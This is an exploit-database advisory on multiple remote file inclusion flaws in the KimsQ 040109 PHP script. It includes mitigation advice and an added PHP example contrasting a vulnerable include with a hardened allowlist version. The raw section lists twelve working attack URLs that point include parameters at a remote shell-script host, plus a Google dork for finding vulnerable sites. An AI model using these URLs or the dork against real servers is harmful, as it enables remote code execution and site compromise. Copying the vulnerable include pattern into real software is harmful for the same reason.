Vendor: KimsQ
By: mat
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: KimsQ
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2009

KimsQ 040109 Multiple Remote File Include Vulnerability

The KimsQ script (version 040109) is vulnerable to multiple remote file inclusion vulnerabilities: the path[home], path[module] and bbs[skin] parameters of several module and skin scripts are used to build include paths without validation. An attacker can exploit these vulnerabilities by making the script include a file hosted on a remote server, which can lead to arbitrary code execution on the web server or unauthorized access to sensitive information.

Mitigation:

To mitigate the vulnerability, update to a patched version of the KimsQ script where one is available, or apply appropriate security measures such as input validation and sanitization of the parameters used to build include paths.
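The following is an added example, not code from KimsQ or from the advisory author, showing the include pattern the advisory implies beside a hardened replacement. The file layout, the `APP_BASE` constant and the function names are assumptions; the skin names in the allowlist are the four default skins named in the advisory.

```php
<?php
// Added example (hypothetical, not KimsQ code). Demonstrates why an include
// built from request-controlled data is a remote file inclusion, and how
// input validation removes the problem.

// --- Vulnerable pattern (reconstruction of what the advisory describes) ---
// If $path is populated from the request (register_globals, or an explicit
// copy of $_GET['path']), $path['home'] is attacker-controlled. When PHP's
// allow_url_include is on, include() will fetch and execute a remote file.
function vulnerable_include(array $path): void
{
    include $path['home'] . '/lib/common.php';   // assumed file name
}

// --- Hardened replacement ---
// Resolve the base directory once, restrict any user-chosen component to an
// allowlist, build the path from constants, and verify the canonical result
// still lies under the base directory before including it.
define('APP_BASE', realpath(__DIR__));           // assumed application root

function safe_include_skin(string $skin): bool
{
    // 1. Allowlist: only the known skin names are accepted.
    $allowed = ['default_blog', 'default_board', 'default_gallery', 'default_webzine'];
    if (!in_array($skin, $allowed, true)) {
        return false;
    }

    // 2. The path is assembled from trusted constants plus the validated name;
    //    the request never supplies a scheme, a directory or a traversal.
    $candidate = APP_BASE . '/_sys/_ext/skin/_skin/' . $skin . '/comment.php';

    // 3. realpath() returns false for URLs and for files that do not exist, and
    //    the prefix check rejects anything that resolved outside APP_BASE.
    $resolved = realpath($candidate);
    if ($resolved === false || strpos($resolved, APP_BASE . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }

    include $resolved;
    return true;
}

// Usage: the skin name still comes from the request, but only a value that
// passed the allowlist and the path check ever reaches include().
$skin = isset($_GET['bbs']['skin']) ? (string) $_GET['bbs']['skin'] : 'default_board';
if (!safe_include_skin($skin)) {
    http_response_code(400);
    echo 'invalid skin';
}
```

As a defence-in-depth measure independent of the code fix, `allow_url_include` (and, where the application does not need it, `allow_url_fopen`) can be set to `Off` in php.ini so that `include` cannot retrieve files over HTTP at all; the allowlist above is still needed, because it also blocks local file inclusion and directory traversal through the same parameter.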

Exploit-DB raw data:

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
KimsQ 040109 Multiple Remote File Include Vulnerability
Script: http://kimsq.googlecode.com/files/kimsq_v040109.zip
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//------------------------------------------------------------------+

http://[target]/[path]/_sys/_ext/module/chat/default/q/user.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/contentsbox/default/admin/config.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/counter/default/admin/referer.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/info.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/mbrinfo/default/q/log.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.gallery.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/minibox/default/q/q.profile.php?path[home]=http://[shellscript]
http://[target]/[path]/_sys/_ext/module/survey/default/_admin.php?path[module]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_blog/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_board/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_gallery/comment.php?bbs[skin]=http://[shellscript]
http://[target]/[path]/_sys/_ext/skin/_skin/default_webzine/comment.php?bbs[skin]=http://[shellscript]

//------------------------------------------------------------------+

Google Dork: "kims Q - Administrator Login Mode"

Greetings: All Hackerz